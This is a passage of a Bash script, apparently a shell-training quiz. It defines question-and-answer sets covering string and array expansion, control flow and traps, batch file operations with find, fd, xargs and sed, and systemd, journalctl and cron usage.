  questions+=("Count unique values in column ${col} in ${W}${csv}${C}§cut -d, -f${col} ${csv} | sort | uniq -c§awk -F, '{print \$${col}}' ${csv} | sort | uniq -c")
  questions+=("Extract and count unique IPs from ${log}§grep -oE '[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+' ${log} | sort | uniq -c | sort -rn§rg -o '[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+' ${log} | sort | uniq -c | sort -rn")
  questions+=("Most common words in ${txt}§tr -s ' ' '\\n' < ${txt} | sort | uniq -c | sort -rn | head§tr -s ' ' '\\n' < ${txt} | sort | uniq -c | sort -nr | head")
  questions+=("Lines appearing in both ${txt} and ${txt2}|comm -12 <(sort ${txt}) <(sort ${txt2})|comm -1 -2 <(sort ${txt}) <(sort ${txt2})|grep -Fxf ${txt} ${txt2}|grep -Fxf ${txt2} ${txt}")
  questions+=("Lines only in ${txt}, not ${txt2}|comm -23 <(sort ${txt}) <(sort ${txt2})|comm -2 -3 <(sort ${txt}) <(sort ${txt2})|grep -Fxvf ${txt2} ${txt}")
}

# Level 19: String & Arrays
gen_level19() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx
  questions+=("Extract filename from /path/to/${txt} (stored in \$path)|echo \${path##*/}|basename \$path")
  questions+=("Get parent directory from \$fullpath|echo \${fullpath%/*}|dirname \$fullpath")
  questions+=("Get filename from /var/log/${log}|basename /var/log/${log}")
  questions+=("Get directory from /var/log/${log}|dirname /var/log/${log}")
  questions+=("Strip .log extension from ${log} using basename|basename ${log} .log")
  questions+=("Get extension from ${cfg} (stored in \$file)|echo \${file##*.}|printf '%s\\n' \${file##*.}|printf '%s\\n' \"\${file##*.}\"")
  questions+=("Remove extension from ${log} (stored in \$file)|echo \${file%.*}|printf '%s\\n' \${file%.*}|printf '%s\\n' \"\${file%.*}\"")
  questions+=("Create backup of ${W}${cfg}${C} with .bak extension|cp ${cfg}{,.bak}|cp ${cfg} ${cfg}.bak")
  questions+=("Strip leading 'v' from version string \$ver (e.g., v1.2.3)|echo \${ver#v}")
  questions+=("Remove protocol from URL \$url (e.g., https://)|echo \${url#*://}")
  questions+=("Get domain from \$url (e.g., ${Y}host.com/path/file${C}, no protocol)|echo \${url%%/*}")
  questions+=("Get last 3 characters of \$var|echo \${var: -3}|echo \${var:(-3)}")
  questions+=("Replace first 'old' with 'new' in \$var|echo \${var/old/new}")
  questions+=("Replace ALL 'old' with 'new' in \$var|echo \${var//old/new}")
  questions+=("Replace 'old' at START of \$var|echo \${var/#old/new}")
  questions+=("Replace 'old' at END of \$var|echo \${var/%old/new}")
  questions+=("Delete all spaces from \$var|echo \${var// /}")
  questions+=("Delete all digits from \$var|echo \${var//[0-9]/}|echo \${var//[[:digit:]]/}")
  questions+=("Extract substring from position 5|echo \${var:5}")
  questions+=("Extract 3 chars starting at position 5|echo \${var:5:3}")
  questions+=("Get first 4 characters of \$var|echo \${var:0:4}|echo \${var::4}")
  questions+=("Get string length of \$var|echo \${#var}|printf '%d\\n' \${#var}|echo \"\${#var}\"")
  questions+=("Convert \$var to lowercase|echo \${var,,}|echo \"\${var,,}\"|printf '%s\\n' \"\${var,,}\"")
  questions+=("Convert \$var to uppercase|echo \${var^^}|echo \"\${var^^}\"|printf '%s\\n' \"\${var^^}\"")
  questions+=("Capitalize first char of \$var|echo \${var^}")
  questions+=("Lowercase first char of \$var|echo \${var,}")
  questions+=("Use 'default' if \$var is unset|echo \${var:-default}")
  questions+=("Set \$var to 'default' if unset|echo \${var:=default}")
  questions+=("Error if \$var is unset|echo \${var:?error message}")
  questions+=("Use 'alt' if \$var IS set|echo \${var:+alt}")
  questions+=("Declare indexed array|declare -a arr|arr=()|declare -a arr=()")
  questions+=("Create array with values|arr=(one two three)")
  questions+=("Access first element|echo \${arr[0]}")
  questions+=("Access last element|echo \${arr[-1]}")
  questions+=("Get all array elements|echo \${arr[@]}|echo \${arr[*]}|echo \"\${arr[@]}\"|echo \"\${arr[*]}\"")
  questions+=("Get array length|echo \${#arr[@]}|echo \${#arr[*]}")
  questions+=("Get array indices|echo \${!arr[@]}|echo \${!arr[*]}")
  questions+=("Append to array|arr+=(four)")
  questions+=("Delete array element at index 1|unset 'arr[1]'|unset arr[1]|unset \"arr[1]\"")
  questions+=("Slice array: elements 1-3|echo \${arr[@]:1:3}")
  questions+=("Declare associative array|declare -A map")
  questions+=("Set associative array value|map[key]=value")
  questions+=("Create associative array inline|declare -A map=([k1]=v1 [k2]=v2)")
  questions+=("Get associative array value|echo \${map[key]}")
  questions+=("Get all keys of associative array|echo \${!map[@]}|echo \${!map[*]}")
  questions+=("Get all values of associative array|echo \${map[@]}|echo \${map[*]}")
  questions+=("Check if key exists in array|[[ -v map[key] ]]|[[ \${map[key]+x} ]]|[[ -n \${map[key]+x} ]]")
  questions+=("Reverse an array§for ((i=\${#arr[@]}-1; i>=0; i--)); do echo \"\${arr[\$i]}\"; done§printf '%s\\n' \"\${arr[@]}\" | tac")
  questions+=("Loop with index|for i in \"\${!arr[@]}\"; do echo \"\$i: \${arr[\$i]}\"; done|for ((i=0; i<\${#arr[@]}; i++)); do echo \"\$i: \${arr[\$i]}\"; done")
  questions+=("Join array with comma|(IFS=','; echo \"\${arr[*]}\")|( IFS=','; echo \"\${arr[*]}\" )|(IFS=,; echo \"\${arr[*]}\")")
  questions+=("Read ${W}${txt}${C} lines into array|mapfile -t arr < ${txt}|readarray -t arr < ${txt}")
  questions+=("Read command output into array|mapfile -t arr < <(ls)|readarray -t arr < <(ls)")
  questions+=("Copy array|arr2=(\"\${arr[@]}\")")
  questions+=("Merge two arrays|merged=(\"\${arr1[@]}\" \"\${arr2[@]}\")")
}

# Level 20: Control Flow & Functions
gen_level20() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx
  questions+=("Basic if statement|if [[ condition ]]; then cmd; fi|if [ condition ]; then cmd; fi|if test condition; then cmd; fi")
  questions+=("if/else statement|if [[ cond ]]; then cmd1; else cmd2; fi|if [ cond ]; then cmd1; else cmd2; fi|if test cond; then cmd1; else cmd2; fi")
  questions+=("if/elif/else|if [[ c1 ]]; then cmd1; elif [[ c2 ]]; then cmd2; else cmd3; fi|if [ c1 ]; then cmd1; elif [ c2 ]; then cmd2; else cmd3; fi|if test c1; then cmd1; elif test c2; then cmd2; else cmd3; fi")
  questions+=("Test if ${W}${txt}${C} exists and display it|[[ -f ${txt} ]] && cat ${txt}|[ -f ${txt} ] && cat ${txt}|test -f ${txt} && cat ${txt}|[[ -e ${txt} ]] && cat ${txt}|[ -e ${txt} ] && cat ${txt}|test -e ${txt} && cat ${txt}")
  questions+=("Test if grep finds ${Y}${term}${C} in ${W}${log}${C}|if grep -q ${term} ${log}; then echo found; fi|grep -q ${term} ${log} && echo found|if grep --quiet ${term} ${log}; then echo found; fi|grep --quiet ${term} ${log} && echo found|if grep --silent ${term} ${log}; then echo found; fi|grep --silent ${term} ${log} && echo found|rg -q ${term} ${log} && echo found|rg --quiet ${term} ${log} && echo found")
  questions+=("Negate condition in ${W}${txt}${C}§if ! [[ -f ${txt} ]]; then echo missing; fi§if ! [ -f ${txt} ]; then echo missing; fi§if [ ! -f ${txt} ]; then echo missing; fi§if [[ ! -f ${txt} ]]; then echo missing; fi§if ! test -f ${txt}; then echo missing; fi§[[ ! -f ${txt} ]] && echo missing§[[ -f ${txt} ]] || echo missing§[ -f ${txt} ] || echo missing§test -f ${txt} || echo missing")
  questions+=("Compound AND condition in ${W}${txt}${C}|if [[ -f ${txt} && -r ${txt} ]]; then cat ${txt}; fi|if [ -f ${txt} ] && [ -r ${txt} ]; then cat ${txt}; fi|[[ -f ${txt} && -r ${txt} ]] && cat ${txt}|[ -f ${txt} ] && [ -r ${txt} ] && cat ${txt}|test -f ${txt} && test -r ${txt} && cat ${txt}")
  questions+=("Compound OR condition§if [[ -z \"\$var\" || \"\$var\" == \"default\" ]]; then echo empty; fi§if [ -z \"\$var\" ] || [ \"\$var\" = \"default\" ]; then echo empty; fi§if test -z \"\$var\" || test \"\$var\" = \"default\"; then echo empty; fi")
  questions+=("Process all .${ext} files in current dir|for f in *.${ext}; do echo \"Processing \$f\"; done|for f in *.${ext}; do echo \"Processing \${f}\"; done")
  questions+=("Rename all .txt to .bak|for f in *.txt; do mv \"\$f\" \"\${f%.txt}.bak\"; done")
  questions+=("Retry curl until success (max ${n} tries)|for i in \$(seq 1 ${n}); do curl -s url && break; sleep 1; done|for i in \$(seq ${n}); do curl -s url && break; sleep 1; done|for ((i=1; i<=${n}; i++)); do curl -s url && break; sleep 1; done")
  questions+=("Loop over servers and check SSH|for h in srv1 srv2 srv3; do ssh -o ConnectTimeout=2 \$h uptime; done")
  questions+=("Process numbered files file1 to file${n}|for i in \$(seq 1 ${n}); do cat file\$i; done|for i in \$(seq ${n}); do cat file\$i; done|for ((i=1; i<=${n}; i++)); do cat file\$i; done")
  questions+=("C-style countdown from ${n}|for ((i=${n}; i>0; i--)); do echo \$i; done|for ((i=${n}; i>=1; i--)); do echo \$i; done")
  questions+=("Loop over array elements|for item in \"\${arr[@]}\"; do echo \"\$item\"; done|for item in \"\${arr[@]}\"; do echo \"\${item}\"; done")
  questions+=("Loop over files in ${dir}/, skip dirs|for f in ${dir}/*; do [[ -f \"\$f\" ]] && echo \"\$f\"; done|for f in ${dir}/*; do [ -f \"\$f\" ] && echo \"\$f\"; done|for f in ${dir}/*; do test -f \"\$f\" && echo \"\$f\"; done")
  questions+=("While loop basic|while [[ condition ]]; do cmd; done|while [ condition ]; do cmd; done|while test condition; do cmd; done")
  questions+=("While read lines from ${W}${txt}${C}|while IFS= read -r line; do echo \"\$line\"; done < ${txt}|while read -r line; do echo \"\$line\"; done < ${txt}")
  questions+=("While with counter|i=0; while ((i < ${n})); do echo \$i; ((i++)); done|i=0; while [[ \$i -lt ${n} ]]; do echo \$i; ((i++)); done|i=0; while [ \$i -lt ${n} ]; do echo \$i; ((i++)); done")
  questions+=("Infinite loop with break|while true; do cmd; [[ cond ]] && break; done|while true; do cmd; [ cond ] && break; done|while true; do cmd; test cond && break; done|while :; do cmd; [[ cond ]] && break; done|while :; do cmd; [ cond ] && break; done|while :; do cmd; test cond && break; done|for ((;;)); do cmd; [[ cond ]] && break; done")
  questions+=("While with continue, read from ${W}${txt}${C}|while read -r line; do [[ -z \"\$line\" ]] && continue; echo \"\$line\"; done < ${txt}|while read -r line; do [ -z \"\$line\" ] && continue; echo \"\$line\"; done < ${txt}|while read -r line; do test -z \"\$line\" && continue; echo \"\$line\"; done < ${txt}")
  questions+=("Read command output line by line§while IFS= read -r line; do echo \"\$line\"; done < <(ls -la)§ls -la | while IFS= read -r line; do echo \"\$line\"; done")
  questions+=("Until ${W}${txt}${C} exists (opposite of while)|until [[ -f ${txt} ]]; do sleep 1; done|until [ -f ${txt} ]; do sleep 1; done|until test -f ${txt}; do sleep 1; done")
  questions+=("Basic case statement|case \"\$var\" in a) echo A;; b) echo B;; *) echo other;; esac")
  questions+=("Case with multiple patterns|case \"\$ext\" in sh|bash) echo shell;; py) echo python;; *) echo other;; esac")
  questions+=("Case for yes/no input|case \"\$ans\" in [Yy]*) echo yes;; [Nn]*) echo no;; *) echo invalid;; esac")
  questions+=("Case with glob patterns|case \"\$file\" in *.txt) echo text;; *.sh) echo script;; esac")
  questions+=("Define simple function|func() { echo hello; }|func () { echo hello; }|function func { echo hello; }|function func() { echo hello; }|function func () { echo hello; }")
  questions+=("Function with local variable|func() { local x=5; echo \$x; }|func () { local x=5; echo \$x; }|function func { local x=5; echo \$x; }|function func() { local x=5; echo \$x; }|function func () { local x=5; echo \$x; }")
  questions+=("Function with arguments|func() { echo \"arg1: \$1, arg2: \$2\"; }|func () { echo \"arg1: \$1, arg2: \$2\"; }|function func { echo \"arg1: \$1, arg2: \$2\"; }|function func() { echo \"arg1: \$1, arg2: \$2\"; }|function func () { echo \"arg1: \$1, arg2: \$2\"; }")
  questions+=("Function with return value|func() { return 0; }; func && echo success|func () { return 0; }; func && echo success|function func { return 0; }; func && echo success|function func() { return 0; }; func && echo success|function func () { return 0; }; func && echo success")
  questions+=("Function returning string via stdout|func() { echo result; }; var=\$(func)|func () { echo result; }; var=\$(func)|function func { echo result; }; var=\$(func)|function func() { echo result; }; var=\$(func)|function func () { echo result; }; var=\$(func)")
  questions+=("Function with all args|func() { echo \"all args: \$@\"; }|func () { echo \"all args: \$@\"; }|function func { echo \"all args: \$@\"; }|function func() { echo \"all args: \$@\"; }|function func () { echo \"all args: \$@\"; }")
  questions+=("Function with arg count|func() { echo \"got \$# args\"; }|func () { echo \"got \$# args\"; }|function func { echo \"got \$# args\"; }|function func() { echo \"got \$# args\"; }|function func () { echo \"got \$# args\"; }")
  questions+=("Check function exists|declare -F func &>/dev/null && echo exists|type func &>/dev/null && echo exists|declare -F func >/dev/null 2>&1 && echo exists|type func >/dev/null 2>&1 && echo exists")
  questions+=("Unset function|unset -f func")
  questions+=("Trap SIGINT (Ctrl+C)|trap 'echo caught' SIGINT|trap 'echo caught' INT|trap 'echo caught' 2|trap \"echo caught\" SIGINT|trap \"echo caught\" INT|trap \"echo caught\" 2")
  questions+=("Trap EXIT for cleanup|trap 'rm -f /tmp/lock' EXIT|trap 'rm -f /tmp/lock' 0|trap \"rm -f /tmp/lock\" EXIT|trap \"rm -f /tmp/lock\" 0")
  questions+=("Trap multiple signals|trap 'cleanup' SIGINT SIGTERM EXIT|trap 'cleanup' INT TERM EXIT|trap 'cleanup' 2 15 0|trap 'cleanup' EXIT SIGINT SIGTERM|trap 'cleanup' EXIT INT TERM|trap 'cleanup' 0 2 15|trap 'cleanup' SIGTERM SIGINT EXIT|trap 'cleanup' SIGTERM EXIT SIGINT|trap 'cleanup' INT EXIT TERM|trap 'cleanup' TERM INT EXIT|trap 'cleanup' TERM EXIT INT|trap 'cleanup' 0 15 2|trap 'cleanup' 15 2 0|trap 'cleanup' 15 0 2|trap 'cleanup' 2 0 15")
  questions+=("Trap ERR for error handling|trap 'echo error at line \$LINENO' ERR|trap \"echo error at line \$LINENO\" ERR")
  questions+=("Exit on any error|set -e|set -o errexit")
  questions+=("Exit on undefined variable|set -u|set -o nounset")
  questions+=("Fail on pipe error|set -o pipefail")
  questions+=("Strict mode combo|set -euo pipefail|set -ueo pipefail|set -o errexit -o nounset -o pipefail|set -eu -o pipefail|set -ue -o pipefail|set -o pipefail -o errexit -o nounset|set -o nounset -o pipefail -o errexit|set -o errexit -o pipefail -o nounset|set -o nounset -o errexit -o pipefail|set -o pipefail -o nounset -o errexit")
  questions+=("Check last command status|[[ \$? -ne 0 ]] && echo failed|[ \$? -ne 0 ] && echo failed|test \$? -ne 0 && echo failed|(( \$? != 0 )) && echo failed|(( \$? )) && echo failed")
  questions+=("Run command, ignore failure§grep pattern file || true§grep pattern file || :")
  questions+=("Die function|die() { echo \"\$1\" >&2; exit 1; }|die () { echo \"\$1\" >&2; exit 1; }|function die { echo \"\$1\" >&2; exit 1; }|function die() { echo \"\$1\" >&2; exit 1; }|function die () { echo \"\$1\" >&2; exit 1; }")
  questions+=("Enable debug mode (print commands)|set -x|set -o xtrace")
  questions+=("Disable debug mode|set +x|set +o xtrace")
}

# Level 21: Batch Ops
gen_level21() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx
  _frnum 2 8; local parallel=$REPLY; _frnum 1 20; local linenum=$REPLY
  questions+=("Run ls -l on each .${ext} file found|find . -name '*.${ext}' -exec ls -l {} \\;|find . -name '*.${ext}' -exec ls -l {} +|fd -e ${ext} -x ls -l {}|fd --extension ${ext} -x ls -l {}|fd -e ${ext} -X ls -l|fd --extension ${ext} -X ls -l|find . -type f -name '*.${ext}' -exec ls -l {} \\;|find . -type f -name '*.${ext}' -exec ls -l {} +")
  questions+=("Count lines in each .${ext} file|find . -name '*.${ext}' -exec wc -l {} \\;|find . -name '*.${ext}' -exec wc -l {} +|fd -e ${ext} -x wc -l {}|fd --extension ${ext} -x wc -l {}|fd -e ${ext} -X wc -l|fd --extension ${ext} -X wc -l")
  questions+=("Delete all .${ext2} files|find . -name '*.${ext2}' -delete|find . -name '*.${ext2}' -exec rm {} \\;|find . -name '*.${ext2}' -exec rm {} +|fd -e ${ext2} -x rm {}|fd --extension ${ext2} -x rm {}|fd -e ${ext2} -X rm|fd --extension ${ext2} -X rm|find . -type f -name '*.${ext2}' -delete")
  questions+=("Make all .sh files executable|find . -name '*.sh' -exec chmod +x {} \\;|find . -name '*.sh' -exec chmod +x {} +|fd -e sh -x chmod +x {}|fd --extension sh -x chmod +x {}|fd -e sh -X chmod +x|fd --extension sh -X chmod +x|find . -type f -name '*.sh' -exec chmod +x {} \\;|find . -type f -name '*.sh' -exec chmod +x {} +")
  questions+=("Search '${term}' in each .${ext} file|find . -name '*.${ext}' -exec grep ${term} {} \\;|find . -name '*.${ext}' -exec grep ${term} {} +|fd -e ${ext} -x rg ${term} {}|fd --extension ${ext} -x rg ${term} {}|fd -e ${ext} -x grep ${term} {}|fd --extension ${ext} -x grep ${term} {}|grep -r --include='*.${ext}' ${term} .|grep -R --include='*.${ext}' ${term} .|rg ${term} -g '*.${ext}'")
  questions+=("Show size of files larger than ${size}|find . -size +${size} -exec du -h {} \\;|find . -size +${size} -exec du -h {} +|fd -S +${size} -x du -h {}|fd --size +${size} -x du -h {}")
  questions+=("Copy all .${ext} files to ${dir}/|find . -name '*.${ext}' -exec cp {} ${dir}/ \\;|find . -name '*.${ext}' -exec cp {} ${dir}/ +|fd -e ${ext} -x cp {} ${dir}/|fd --extension ${ext} -x cp {} ${dir}/|fd -e ${ext} -X cp -t ${dir}/|fd --extension ${ext} -X cp -t ${dir}/")
  questions+=("Move all .${ext2} files to ${dir}/|find . -name '*.${ext2}' -exec mv {} ${dir}/ \\;|find . -name '*.${ext2}' -exec mv {} ${dir}/ +|fd -e ${ext2} -x mv {} ${dir}/|fd --extension ${ext2} -x mv {} ${dir}/|fd -e ${ext2} -X mv -t ${dir}/|fd --extension ${ext2} -X mv -t ${dir}/")
  questions+=("Change owner of all files in ${dir}/ to ${user}|find ${dir}/ -exec chown ${user}:${user} {} \\;|chown -R ${user}:${user} ${dir}/|chown -R ${user} ${dir}/|chown -R ${user}: ${dir}/|chown --recursive ${user}:${user} ${dir}/|chown --recursive ${user} ${dir}/|chown --recursive ${user}: ${dir}/|find ${dir}/ -exec chown ${user}:${user} {} +|find ${dir}/ -exec chown ${user} {} \\;|find ${dir}/ -exec chown ${user} {} +|find ${dir}/ -exec chown ${user}: {} \\;|find ${dir}/ -exec chown ${user}: {} +|sudo find ${dir}/ -exec chown ${user}:${user} {} \\;|sudo find ${dir}/ -exec chown ${user}:${user} {} +|sudo find ${dir}/ -exec chown ${user} {} \\;|sudo find ${dir}/ -exec chown ${user} {} +|sudo find ${dir}/ -exec chown ${user}: {} \\;|sudo find ${dir}/ -exec chown ${user}: {} +|sudo chown -R ${user}:${user} ${dir}/|sudo chown -R ${user} ${dir}/|sudo chown -R ${user}: ${dir}/|sudo chown --recursive ${user}:${user} ${dir}/|sudo chown --recursive ${user} ${dir}/|sudo chown --recursive ${user}: ${dir}/")
  questions+=("Gzip all .${ext} files|find . -name '*.${ext}' -exec gzip {} \\;|find . -name '*.${ext}' -exec gzip {} +|fd -e ${ext} -x gzip {}|fd --extension ${ext} -x gzip {}|fd -e ${ext} -X gzip|fd --extension ${ext} -X gzip")
  questions+=("List all .${ext} files in one ls call|find . -name '*.${ext}' -exec ls -l {} +|fd -e ${ext} -X ls -l|fd --extension ${ext} -X ls -l")
  questions+=("Count total lines across all .${ext} files§find . -name '*.${ext}' -exec wc -l {} + | tail -1§find . -name '*.${ext}' -exec wc -l {} + | tail -n 1§find . -name '*.${ext}' -exec cat {} + | wc -l§fd -e ${ext} -X wc -l | tail -1§fd -e ${ext} -X wc -l | tail -n 1§fd --extension ${ext} -X wc -l | tail -1§fd --extension ${ext} -X wc -l | tail -n 1")
  questions+=("Cat all .${ext} files together|find . -name '*.${ext}' -exec cat {} +|fd -e ${ext} -X cat|fd --extension ${ext} -X cat")
  questions+=("Replace '${old}' with '${new}' in ${cfg}|sed -i 's/${old}/${new}/g' ${cfg}|sed --in-place 's/${old}/${new}/g' ${cfg}|sed -i -e 's/${old}/${new}/g' ${cfg}|sed --in-place -e 's/${old}/${new}/g' ${cfg}|sd '${old}' '${new}' ${cfg}|sed -i \"s/${old}/${new}/g\" ${cfg}|sed --in-place \"s/${old}/${new}/g\" ${cfg}")
  questions+=("Delete lines containing '${term}' in ${log}|sed -i '/${term}/d' ${log}|sed --in-place '/${term}/d' ${log}|sed -i -e '/${term}/d' ${log}|sed --in-place -e '/${term}/d' ${log}")
  questions+=("Delete empty lines from ${txt}|sed -i '/^$/d' ${txt}|sed --in-place '/^$/d' ${txt}|sed -i -e '/^$/d' ${txt}|sed --in-place -e '/^$/d' ${txt}")
  questions+=("Delete lines ${linenum} to $((linenum + n)) from ${txt}|sed -i '${linenum},$((linenum + n))d' ${txt}|sed --in-place '${linenum},$((linenum + n))d' ${txt}|sed -i -e '${linenum},$((linenum + n))d' ${txt}|sed --in-place -e '${linenum},$((linenum + n))d' ${txt}")
  questions+=("Add prefix 'LOG: ' to each line in ${W}${log}${C}|sed -i 's/^/LOG: /' ${log}|sed --in-place 's/^/LOG: /' ${log}|sed -i -e 's/^/LOG: /' ${log}|sed --in-place -e 's/^/LOG: /' ${log}")
  questions+=("Add suffix '.bak' to each line in ${W}${txt}${C}|sed -i 's/\$/.bak/' ${txt}|sed --in-place 's/\$/.bak/' ${txt}|sed -i -e 's/\$/.bak/' ${txt}|sed --in-place -e 's/\$/.bak/' ${txt}")
  questions+=("Replace '${old}' with '${new}' in all .${ext} files|find . -name '*.${ext}' -exec sed -i 's/${old}/${new}/g' {} \\;|find . -name '*.${ext}' -exec sed -i 's/${old}/${new}/g' {} +|fd -e ${ext} -x sd '${old}' '${new}' {}|fd -e ${ext} -x sed -i 's/${old}/${new}/g' {}|fd --extension ${ext} -x sed -i 's/${old}/${new}/g' {}")
  questions+=("Print only lines matching '${term}' in ${W}${log}${C}|sed -n '/${term}/p' ${log}|grep '${term}' ${log}|rg '${term}' ${log}|grep ${term} ${log}|rg ${term} ${log}")
  questions+=("Delete files listed in ${W}filelist.txt${C}§xargs rm < filelist.txt§cat filelist.txt | xargs rm§xargs -a filelist.txt rm§xargs -d '\n' rm < filelist.txt")
  questions+=("Grep in found files (safe with spaces)§find . -name '*.${ext}' -print0 | xargs -0 grep ${term}§find . -name '*.${ext}' -exec grep ${term} {} +§find . -name '*.${ext}' -exec grep ${term} {} \\;§grep -r ${term} --include='*.${ext}'§grep -r ${term} --include='*.${ext}' .§grep -R ${term} --include='*.${ext}'§rg -g '*.${ext}' ${term}§rg --glob '*.${ext}' ${term}")
  questions+=("Count lines in found files (safe with spaces)§find . -name '*.${ext}' -print0 | xargs -0 wc -l§find . -name '*.${ext}' -exec wc -l {} +§find . -name '*.${ext}' -exec wc -l {} \\;§fd -e ${ext} -x wc -l§fd --extension ${ext} -x wc -l")
  questions+=("Grep in parallel (${parallel} jobs)§find . -name '*.${ext}' -print0 | xargs -0 -P ${parallel} grep ${term}§find . -name '*.${ext}' -print0 | xargs -0 -P${parallel} grep ${term}§rg -g '*.${ext}' -j ${parallel} ${term}§rg -g '*.${ext}' --threads ${parallel} ${term}§rg --glob '*.${ext}' -j ${parallel} ${term}")
  questions+=("Confirm before each delete (interactive)§find . -name '*.${ext2}' -print0 | xargs -0 -p rm§find . -name '*.${ext2}' -ok rm {} \\;§find . -name '*.${ext2}' -exec rm -i {} \\;")
  questions+=("Copy files in batches of ${n}§find . -name '*.${ext}' -print0 | xargs -0 -n ${n} cp -t ${dir}/")
  questions+=("Rename files with backup_ prefix§find . -maxdepth 1 -name '*.${ext}' -printf '%f\\n' | xargs -I {} mv {} backup_{}")
  questions+=("Preview what xargs would run (verbose/trace mode)§find . -name '*.${ext}' -print0 | xargs -0 -t wc -l")
  questions+=("Find .${ext} files > ${size}, show sizes sorted§find . -name '*.${ext}' -size +${size} -exec du -h {} \\; | sort -rh§find . -name '*.${ext}' -size +${size} -exec du -h {} + | sort -rh§fd -e ${ext} -S +${size} -x du -h {} | sort -rh§fd --extension ${ext} --size +${size} -x du -h {} | sort -rh")
  questions+=("Replace and backup: ${old} -> ${new}, keep .bak in ${W}${cfg}${C}|sed -i.bak 's/${old}/${new}/g' ${cfg}|sed --in-place=.bak 's/${old}/${new}/g' ${cfg}|sed -i.bak -e 's/${old}/${new}/g' ${cfg}|sed --in-place=.bak -e 's/${old}/${new}/g' ${cfg}")
  questions+=("Find and replace recursively in ${dir}/|find ${dir}/ -type f -exec sed -i 's/${old}/${new}/g' {} \\;|find ${dir}/ -type f -exec sed -i 's/${old}/${new}/g' {} +|fd -t f . ${dir}/ -x sed -i 's/${old}/${new}/g' {}|fd --type f . ${dir}/ -x sed -i 's/${old}/${new}/g' {}")
  questions+=("Reload ${svc} config without restart|systemctl reload ${svc}|sudo systemctl reload ${svc}|systemctl reload ${svc}.service|sudo systemctl reload ${svc}.service")
  questions+=("Check if ${svc} is enabled|systemctl is-enabled ${svc}|sudo systemctl is-enabled ${svc}|systemctl is-enabled ${svc}.service|sudo systemctl is-enabled ${svc}.service")
  questions+=("Check if ${svc} is active|systemctl is-active ${svc}|sudo systemctl is-active ${svc}|systemctl is-active ${svc}.service|sudo systemctl is-active ${svc}.service")
  questions+=("Show ${svc} unit file|systemctl cat ${svc}|sudo systemctl cat ${svc}")
  questions+=("Edit ${svc} unit file override|systemctl edit ${svc}|sudo systemctl edit ${svc}")
  questions+=("Mask ${svc} (prevent starting)|systemctl mask ${svc}|sudo systemctl mask ${svc}")
  questions+=("Unmask ${svc}|systemctl unmask ${svc}|sudo systemctl unmask ${svc}")
  questions+=("View last ${n2} log lines for ${svc}|journalctl -u ${svc} -n ${n2}|journalctl --unit ${svc} --lines ${n2}|journalctl --unit ${svc} --lines=${n2}|journalctl -u ${svc} --lines ${n2}|journalctl -u ${svc} --lines=${n2}|journalctl --unit ${svc} -n ${n2}|journalctl -u ${svc} -n${n2}|journalctl -u ${svc}.service -n ${n2}")
  questions+=("View kernel messages|journalctl -k|journalctl --dmesg|dmesg|sudo dmesg")
  questions+=("View logs from last hour|journalctl --since '1 hour ago'|journalctl --since='1 hour ago'|journalctl -S '1 hour ago'")
  questions+=("View logs from last ${n} minutes|journalctl --since '${n} minutes ago'|journalctl --since='${n} minutes ago'|journalctl -S '${n} minutes ago'")
  questions+=("View errors only|journalctl -p err|journalctl -p 3|journalctl -p error|journalctl --priority err|journalctl --priority error|journalctl --priority=err|journalctl --priority=error|journalctl --priority=3|journalctl -p3")
  questions+=("Disk usage of journal|journalctl --disk-usage")
  local jsize=${size/k/K}
  questions+=("Vacuum journal to ${jsize}|journalctl --vacuum-size=${jsize}|journalctl --vacuum-size ${jsize}|sudo journalctl --vacuum-size=${jsize}|sudo journalctl --vacuum-size ${jsize}")
  questions+=("Output as JSON|journalctl -u ${svc} -o json|journalctl --unit ${svc} -o json|journalctl -u ${svc} --output json|journalctl -u ${svc} --output=json|journalctl --unit ${svc} --output json|journalctl --unit ${svc} --output=json")
  questions+=("Edit your crontab|crontab -e")
  questions+=("List your cron jobs|crontab -l")
  questions+=("Remove all your cron jobs|crontab -r")
  questions+=("Edit root's crontab|sudo crontab -e")
  local cron_path="/usr/local/bin/${script}"
  questions+=("Run ${script} every 5 minutes|*/5 * * * * ${cron_path}")
  questions+=("Run ${script} at midnight daily|0 0 * * * ${cron_path}|@daily ${cron_path}")
  questions+=("Run ${script} every Monday at 3am|0 3 * * 1 ${cron_path}|0 3 * * mon ${cron_path}|0 3 * * Mon ${cron_path}|0 3 * * MON ${cron_path}")
  questions+=("Run ${script} on the 1st of each month|0 0 1 * * ${cron_path}|@monthly ${cron_path}")
  questions+=("Run ${script} every hour|0 * * * * ${cron_path}|@hourly ${cron_path}")
  questions+=("Run ${script} at reboot|@reboot ${cron_path}")
  questions+=("Cron: redirect output to log§*/5 * * * * ${cron_path} >> /var/log/${script%.sh}.log 2>&1")
  questions+=("Cron: silence all output§0 * * * * ${cron_path} > /dev/null 2>&1§0 * * * * ${cron_path} &> /dev/null§0 * * * * ${cron_path} &>/dev/null")
  questions+=("Replace '${old}' with '${new}' in all .${ext} files (batch)§find . -name '*.${ext}' -exec grep -l ${old} {} \\; | xargs sed -i 's/${old}/${new}/g'§find . -name '*.${ext}' -exec sed -i 's/${old}/${new}/g' {} \\;§find . -name '*.${ext}' -exec sed -i 's/${old}/${new}/g' {} +§fd -e ${ext} -x sed -i 's/${old}/${new}/g' {}§fd --extension ${ext} -x sed -i 's/${old}/${new}/g' {}")
  questions+=("Find .${ext} files > ${size}, print and delete§find . -name '*.${ext}' -size +${size} -print -delete")
  questions+=("Check ${svc} status, restart if not active§systemctl is-active ${svc} || systemctl restart ${svc}§systemctl is-active ${svc} || sudo systemctl restart ${svc}§sudo systemctl is-active ${svc} || sudo systemctl restart ${svc}§systemctl is-active --quiet ${svc} || systemctl restart ${svc}§systemctl is-active -q ${svc} || systemctl restart ${svc}§systemctl is-active --quiet ${svc} || sudo systemctl restart ${svc}§systemctl is-active -q ${svc} || sudo systemctl restart ${svc}")
  questions+=("View ${svc} errors, count unique messages§journalctl -u ${svc} -p err --no-pager | sort | uniq -c | sort -rn§journalctl --unit ${svc} -p err --no-pager | sort | uniq -c | sort -rn")
